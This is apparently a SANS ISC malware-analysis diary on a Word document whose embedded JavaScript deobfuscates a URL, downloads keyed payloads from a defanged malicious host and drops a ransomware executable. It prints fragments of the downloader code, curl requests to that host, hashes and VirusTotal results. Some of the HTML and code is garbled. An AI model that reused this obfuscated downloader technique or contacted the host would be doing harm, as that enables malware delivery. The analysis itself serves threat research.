Another Day, Another Obfuscation Technique, (Fri, Apr 28th)

We got many samples from our readers and wethank them for this. It helps us to find how attackers are improving their techniques to bypass security controls and to fool the victims. Often the provided samples are coming from common waves of spam but, sometimes, they are interesting. I padding:5px 10px"> viper Order-complete.docx info +----------+----------------------------------------------------------------------------------------------------------------------------------+ | Key | Value | +----------+----------------------------------------------------------------------------------------------------------------------------------+ | Name | Order-complete.docx | | Tags | whiteknight | | Path | /home/nonroot/.viper/binaries/2/9/d/c/29dcb52fc33dd94a4e2eb866ad3e86ec60f3414372dbd557308d6c59b7131ae3 | | Size | 17034 | | Type | Microsoft Word 2007+ | | Mime | application/vnd.openxmlformats-officedocument.wordprocessingml.document | | MD5 | 64b342c80a7f9e7ec1c85f1f0059feb3 | | SHA1 | 5e0b0c0ed682139588f61f37eaf789003590b66a | | SHA256 | 29dcb52fc33dd94a4e2eb866ad3e86ec60f3414372dbd557308d6c59b7131ae3 | | SHA512 | ae709954da0b03a85323e180961a393820a4289a52e1ae752f499a58947863df86cbb9f66a6a7fe5478f9b64278f055f10bc6ba1871df28f882f71d756cbae48 | | SSdeep | 384:TyD28Wf7rR+4pMyFvt3nr+Jjgozm3BTmDU:FpzrgeRrqXgMU | | CRC32 | 58486E87 | | Parent | | | Children | 25545563f98f99ee0274c2698eefbfec91e176d2165f755ca7ef455b3d468016, | +----------+----------------------------------------------------------------------------------------------------------------------------------+ viper Order-complete.docx padding:5px 10px"> Sub Auto_Open() Msgbox Welcome to SANS ISC! padding:5px 10px"> viper Order-complete.docx office -s [*] Document Structure - [Content_Types].xml - _rels/.rels - word/_rels/document.xml.rels - word/document.xml - word/media/image1.emf - word/embeddings/oleObject1.bin - word/theme/theme1.xml - word/settings.xml - word/webSettings.xml - docProps/core.xml - word/styles.xml - word/fontTable.xml - docProps/app.xml

The Javascript is located in word/embeddings/oleObject1.bin. Once extracted and stored in %APPDATA%\Local\Temp\Order complete.js, it is executed and download a malicious PE file. Let try { c.open(deobfus(----uFuwwu,1), deobfus(----qqq:qLU:qjqtqqq:UtF_qF_,1)+?ff + loop, } var data = c.responseText.indexOf(||| padding:5px 10px"> hxxp://dev.watershowbranson.com/info.php?ffX

x being incremented by the loop.

When you try to access manually this URL, you get a different content depending on x padding:5px 10px"> $ curl hxxp://dev.watershowbranson.com/info.php?ff1 7,1,2,1,7,7,4,7,6,9,5,5,2|||1d6a11774069571211747695ffff7121b57476957121774709571217747695712177476957121774769571217747695...(removed) $ curl hxxp://dev.watershowbranson.com/info.php?ff2 7,2,4,0,2,8,4,8,0,1,8,2,3|||1d7a30284101872406848018ffff7240b08480187240284841872402848018724028480187240284801872402848018...(removed) $ curl hxxp://dev.watershowbranson.com/info.php?ff3 9,2,0,7,4,7,6,4,1,1,6,4,2|||3d7a97476711692078764116ffff9207b27641169207476451692074764116920747641169207476411692074764116...(removed)

Note the ||| var daddbdbfeed = ebcebafed } function deobfus(s,key){ var fcddcdfcfcfc = $d.JkT0_gOQ7F:%(*Z,-fCIximY^DLva+WB@4u8HX)pbNhSGsloe5w var buffer = abcafefaddd if (cfbbadafdfabf0) { padding:5px 10px"> var foo = deobfus(----qqq:qLU:qjqtqqq:UtF_qF_ padding:5px 10px"> hxxp://dev.watershowbranson.com/info.php

Data returned by the HTTP request use another obfuscation technique. Data are passed to another function with the key being the array of integers (example as seen above: padding:5px 10px"> viper cab4.exe virustotal -v [+] VirusTotal Report for 5dc3d99293fe7b70a9796cf04492b954: [*] Detecting engines: +-------------------+--------------------------------------------+ | Antivirus | Signature | +-------------------+--------------------------------------------+ | Baidu | Win32.Trojan.WisdomEyes.16070401.9500.9999 | | CrowdStrike | malicious_confidence_100% (D) | | Cyren | W32/Spora.E.gen!Eldorado | | Endgame | malicious (high confidence) | | F-Prot | W32/Spora.E.gen!Eldorado | | Fortinet | W32/GenKryptik.ADNX!tr | | Invincea | virus.win32.sality.at | | McAfee | Ransomware-FMFE!5DC3D99293FE | | McAfee-GW-Edition | BehavesLike.Win32.Backdoor.fc | | Qihoo-360 | HEUR/QVM19.1.C414.Malware.Gen | | SentinelOne | static engine - malicious | | Sophos | Mal/Elenoocka-E | | Symantec | ML.Attribute.HighConfidence | +-------------------+--------------------------------------------+ [*] 13 out of 61 antivirus detected 5dc3d99293fe7b70a9796cf04492b954 as malicious. [*] https://www.virustotal.com/file/13e7a1f1291b0ddf1587d86b94989e0d8ff4884e3f2354810130a7865d0d431c/analysis/1493313215/

In this example, we have multiple payloads downloaded with their associated key (no direct PE file), we dont see XOR encryption or Base64 encoding. Nothingsuspicious, just plain text!

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.